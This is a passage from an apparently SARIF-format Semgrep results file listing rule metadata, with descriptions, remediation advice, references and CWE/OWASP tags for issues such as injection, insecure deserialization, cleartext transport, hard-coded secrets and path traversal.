bcrypt."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","id":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","name":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath","id":"java.micronaut.xpath.tainted-xpath.tainted-xpath","name":"java.micronaut.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","id":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","name":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request)\n - [https://openjdk.java.net/groups/net/httpclient/intro.html](https://openjdk.java.net/groups/net/httpclient/intro.html)\n","text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","id":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","name":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"help":{"markdown":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen","id":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","name":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","properties":{"precision":"very-high","tags":["CWE-131: Incorrect Calculation of Buffer Size","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.alloc-strlen.alloc-strlen"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","id":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","name":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"help":{"markdown":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8)\n","text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","id":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","name":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","id":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","name":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli)\n - [https://www.npmjs.com/package/mysql2](https://www.npmjs.com/package/mysql2)\n - [https://www.npmjs.com/package/mysql](https://www.npmjs.com/package/mysql)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","id":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","name":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unencrypted request over HTTP detected."},"help":{"markdown":"Unencrypted request over HTTP detected.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request)\n - [https://www.npmjs.com/package/axios](https://www.npmjs.com/package/axios)\n","text":"Unencrypted request over HTTP detected."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request","id":"typescript.react.security.react-insecure-request.react-insecure-request","name":"typescript.react.security.react-insecure-request.react-insecure-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-insecure-request.react-insecure-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open","id":"ruby.lang.security.dangerous-open.dangerous-open","name":"ruby.lang.security.dangerous-open.dangerous-open","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-open.dangerous-open"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","id":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","name":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","id":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","name":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pyyaml.tainted-pyyaml"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","id":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","name":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"help":{"markdown":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","id":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","name":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"help":{"markdown":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\"\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n - [https://nodejs.org/api/tls.html#tls_tls_default_min_version](https://nodejs.org/api/tls.html#tls_tls_default_min_version)\n","text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","id":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","name":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"help":{"markdown":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","id":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","name":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","id":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","name":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret)\n - 